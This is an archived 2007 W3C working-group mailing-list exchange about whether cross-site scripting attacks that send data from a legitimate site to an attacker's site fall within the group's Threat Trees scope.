- From: Johnathan Nightingale <johnath@mozilla.com>
- Date: Mon, 26 Mar 2007 13:55:14 -0400
- To: "Stuart E. Schechter" <ses@ll.mit.edu>
- Cc: Mary Ellen Zurko <Mary_Ellen_Zurko@notesdev.ibm.com>, W3C WSC W3C WSC Public <public-wsc-wg@w3.org>
As Stuart says, his reorganization moved some of these. My references
can be matched against this version of the document:
http://www.w3.org/2006/WSC/wiki/ThreatTrees?action=recall&rev=25
Basically the attacks I was suggesting were in-scope for our group
are the ones where, for the attack to be successful, the browser
needs to follow instructions on legitimate.com which require it to
send data to attacker.com. Whereas we consider much of XSS to be out
of scope, this piece of information ("the web page at legitimate.com
is trying to access data from attacker.com") seems like a piece of
the web security context.
Now, of course, deciding if and when to display that would be
challenging, particularly since sites are forever interlinking in
perfectly benign ways, ever moreso with the recent mashup/aggregation
mania. So I'm not suggesting a recommendation be written to show
this information in a primary way. I am suggesting only that we not
consider these kinds of attacks out of our scope.
Cheers,
J
---
Johnathan Nightingale
Human Shield
johnath@mozilla.com
On 26-Mar-07, at 1:42 PM, Stuart E. Schechter wrote:
> That's because of the changes I made after Jonathan's. See the
> follow-up
> post I sent for details.
>
>
>> From: Mary Ellen Zurko <Mary_Ellen_Zurko@notesdev.ibm.com>
>> Date: Mon, 26 Mar 2007 13:39:02 -0400
>> To: "Johnathan Nightingale <johnath" <johnath@mozilla.com>
>> Cc: W3C WSC Public <public-wsc-wg@w3.org>
>> Subject: Re: ACTION-164 - Elaborate Cross Site Scripting in Wiki
>> Resent-From: <public-wsc-wg@w3.org>
>> Resent-Date: Mon, 26 Mar 2007 17:39:08 +0000
>>
>> There is not currently a "2.A.i", and several others you cite.
>>
>> Mez
>>
>>
>>
>>
>>
>> Johnathan Nightingale <johnath@mozilla.com>
>> Sent by: public-wsc-wg-request@w3.org
>> 03/23/2007 10:24 AM
>>
>> To
>> W3C WSC Public <public-wsc-wg@w3.org>
>> cc
>>
>> Subject
>> ACTION-164 - Elaborate Cross Site Scripting in Wiki
>>
>>
>>
>>
>>
>>
>>
>> Hello all,
>>
>> I've updated the Threat Trees page of the Wiki with more detailed
>> information on cross site scripting. I've also made some minor
>> editorial changes, more clearly calling out the description and goals
>> of each attack. You can see the current version here.
>>
>> http://www.w3.org/2006/WSC/wiki/ThreatTrees
>>
>> As discussed on the call earlier this week, much of XSS is beyond our
>> scope. I would suggest, however, that 2.A.i, 2.A.iv, 2.B.i, and
>> 2.B.iv, all of which involve the site sending information to a
>> different site than the legitimate one being viewed, constitute
>> information that a user agent *might* deem relevant to the user. The
>> others branches are there for completeness but, operating exclusively
>> within the site being viewed, likely represent security issues beyond
>> our scope.
>>
>> Any comments are, of course, invited. And I hope Stuart doesn't
>> object to my formatting changes. :)
>>
>> Cheers,
>>
>> Johnathan
>>
>> ---
>> Johnathan Nightingale
>> Human Shield
>> johnath@mozilla.com
>>
>>
>>
>>
>>
>>
>
>
Received on Monday, 26 March 2007 17:55:21 UTC